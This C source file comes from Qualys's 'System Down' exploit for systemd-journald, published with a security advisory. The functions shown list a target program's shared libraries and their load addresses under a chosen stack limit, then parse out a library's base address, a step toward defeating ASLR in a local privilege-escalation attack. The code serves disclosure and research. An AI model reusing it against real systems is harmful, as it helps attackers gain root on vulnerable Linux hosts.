/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <errno.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#include "journald.h"
#include "ldd.h"
#include "macro.h"
#include "target.h"

#define LIBRARY_ADDRESS "^.*[\t ]\\(/[^ ]*\\) (\\(0x[^)]*\\))$"

void
list_shared_libraries(const char * const program, char * const buf, const size_t size)
{
    if (!buf) die();
    if (size < 1) die();
    if (!program) die();

    xsnprintf(buf, size,
        "ulimit -s %zu && env -i LD_TRACE_LOADED_OBJECTS=1 %s | grep '%s' | sed 's#%s#\\1 \\2#' | sort -k 2",
        journald_LimitSTACKSoft() / 1024, program, LIBRARY_ADDRESS, LIBRARY_ADDRESS);

    FILE * const fp = popen(buf, "re");
    if (!fp) die();

    size_t len = 0;
    for (;;) {
        const size_t nbr = fread(buf + len, 1, size - len, fp);
        if (nbr <= 0) {
            if (!feof(fp)) die();
            if (ferror(fp)) die();
            break;
        }
        if (nbr >= size - len) die();
        len += nbr;
    }
    if (len <= 0) die();
    if (len >= size) die();
    buf[len] = '\0';

    if (pclose(fp) == -1) die();
}

uintptr_t
shared_library_address(const char * const haystack, const char * const needle)
{
    if (!haystack) die();

    const char * ptr = needle ? strstr(haystack, needle) : haystack;
    if (!ptr) die();
    ptr = strchr(ptr, ' ');
    if (!ptr) die();
    ptr++;
    if (needle && strstr(ptr, needle)) die();
    if (ptr[0] != '0') die();
    if (ptr[1] != 'x') die();

    errno = 0;
    char * end = NULL;
    const uintmax_t address = strtoumax(ptr, &end, 16);
    if (errno || end <= ptr || *end != '\n') die();

    if (address <= 0) die();
    if (address >= UINTPTR_MAX) die();
    if (!is_mmap_address(address)) die();
    if (address % PAGE_SIZE) die();
    return address;
}

